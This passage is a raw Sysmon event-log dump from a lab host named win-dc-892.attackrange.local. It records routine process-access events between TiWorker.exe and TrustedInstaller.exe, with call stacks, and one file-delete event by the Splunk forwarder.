85e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.212{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.197{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.181{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.181{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.166{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.150{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B46EAD4CC3FAD06FCE91E6B9A8A55B,SHA256=9D304D25B3DB21964F3D01E86E4AEEB2C0B3C1871A20DBF567BA39DBBDD8F277,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.150{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.134{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
